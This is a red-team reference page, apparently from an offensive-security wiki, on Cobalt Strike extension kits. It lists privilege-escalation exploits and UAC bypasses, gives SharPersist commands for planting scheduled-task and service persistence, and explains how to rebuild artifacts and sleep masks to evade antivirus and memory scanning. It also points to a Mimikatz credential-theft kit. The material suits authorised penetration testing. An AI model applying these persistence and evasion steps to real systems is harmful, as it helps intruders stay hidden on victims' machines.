cobalt-strike-kits.md (5394B)
1 --- 2 title: "Cobalt Strike - Kits" 3 section: "Command & Control" 4 sectionSlug: "command-control" 5 sourcePath: "docs/command-control/cobalt-strike-kits.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/command-control/cobalt-strike-kits.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Cobalt Strike - Kits 12 13 * [Cobalt Strike Community Kit](https://cobalt-strike.github.io/community_kit/) - Community Kit is a central repository of extensions written by the user community to extend the capabilities of Cobalt Strike 14 15 ## Elevate Kit 16 17 UAC Token Duplication : Fixed in Windows 10 Red Stone 5 (October 2018) 18 19 ```powershell 20 beacon> runasadmin 21 22 Beacon Command Elevators 23 ======================== 24 25 Exploit Description 26 ------- ----------- 27 ms14-058 TrackPopupMenu Win32k NULL Pointer Dereference (CVE-2014-4113) 28 ms15-051 Windows ClientCopyImage Win32k Exploit (CVE 2015-1701) 29 ms16-016 mrxdav.sys WebDav Local Privilege Escalation (CVE 2016-0051) 30 svc-exe Get SYSTEM via an executable run as a service 31 uac-schtasks Bypass UAC with schtasks.exe (via SilentCleanup) 32 uac-token-duplication Bypass UAC with Token Duplication 33 ``` 34 35 ## Persistence Kit 36 37 * [0xthirteen/MoveKit](https://github.com/0xthirteen/MoveKit) 38 * [fireeye/SharPersist](https://github.com/fireeye/SharPersist) 39 40 ```powershell 41 # List persistences 42 SharPersist -t schtaskbackdoor -m list 43 SharPersist -t startupfolder -m list 44 SharPersist -t schtask -m list 45 46 # Add a persistence 47 SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add 48 SharPersist -t schtaskbackdoor -n "Something Cool" -m remove 49 50 SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Service" -m add 51 SharPersist -t service -n "Some Service" -m remove 52 53 SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add 54 SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly 55 SharPersist -t schtask -n "Some Task" -m remove 56 ``` 57 58 ## Resource Kit 59 60 > The Resource Kit is Cobalt Strike's means to change the HTA, PowerShell, Python, VBA, and VBS script templates Cobalt Strike uses in its workflows 61 62 ## Artifact Kit 63 64 > Cobalt Strike uses the Artifact Kit to generate its executables and DLLs. The Artifact Kit is a source code framework to build executables and DLLs that evade some anti-virus products. The Artifact Kit build script creates a folder with template artifacts for each Artifact Kit technique. To use a technique with Cobalt Strike, go to Cobalt Strike -> Script Manager, and load the artifact.cna script from that technique's folder. 65 66 [Artifact Kit (Cobalt Strike 4.0)](https://www.youtube.com/watch?v=6mC21kviwG4) 67 68 * Download the artifact kit : `Go to Help -> Arsenal to download Artifact Kit (requires a licensed version of Cobalt Strike)` 69 * Install the dependencies : `sudo apt-get install mingw-w64` 70 * Edit the Artifact code 71 * Change pipename strings 72 * Change `VirtualAlloc` in `patch.c`/`patch.exe`, e.g: HeapAlloc 73 * Change Import 74 * Build the Artifact 75 * Cobalt Strike -> Script Manager > Load .cna 76 77 ## Mimikatz Kit 78 79 * Download and extract the .tgz from the Arsenal 80 * Load the mimikatz.cna aggressor script 81 * Use mimikatz functions as normal 82 83 ## Sleep Mask Kit 84 85 > The Sleep Mask Kit is the source code for the sleep mask function that is executed to obfuscate Beacon, in memory, prior to sleeping. 86 87 Use the included `build.sh` or `build.bat` script to build the Sleep Mask Kit on Kali Linux or Microsoft Windows. The script builds the sleep mask object file for the three types of Beacons (default, SMB, and TCP) on both x86 and x64 architectures in the sleepmask directory. The default type supports HTTP, HTTPS, and DNS Beacons. 88 89 ## Mutator Kit 90 91 > The Mutator Kit, introduced by Cobalt Strike, is a tool designed to create uniquely mutated versions of a "sleep mask" used in payloads to evade detection by static signatures. It utilizes LLVM obfuscation techniques to alter the sleep mask, making it difficult for memory scanning tools to identify the mask based on predefined patterns, thereby enhancing operational security for red team activities. 92 93 The OBFUSCATIONS variable can be `flattening`,`substitution`,`split-basic-blocks`,`bogus`. 94 95 ```ps1 96 OBFUSCATIONS=substitution mutator.sh x64 -emit-llvm -S example.c -o example_with_substitutions.ll 97 mutator.sh x64 -c -DIMPL_CHKSTK_MS=1 -DMASK_TEXT_SECTION=1 -o sleepmask.x64.o src49/sleepmask.c 98 ``` 99 100 ## Thread Stack Spoofer 101 102 > An advanced in-memory evasion technique that spoofs Thread Call Stack. This technique allows to bypass thread-based memory examination rules and better hide shellcodes while in-process memory. 103 104 Thread Stack Spoofer is now enabled by default in the Artifact Kit, it is possible to disable it via the option `artifactkit_stack_spoof` in the config file `arsenal_kit.config`. 105 106 ## References 107 108 * [Introducing the Mutator Kit: Creating Object File Monstrosities with Sleep Mask and LLVM - @joehowwolf @HenriNurmi](https://www.cobaltstrike.com/blog/introducing-the-mutator-kit-creating-object-file-monstrosities-with-sleep-mask-and-llvm)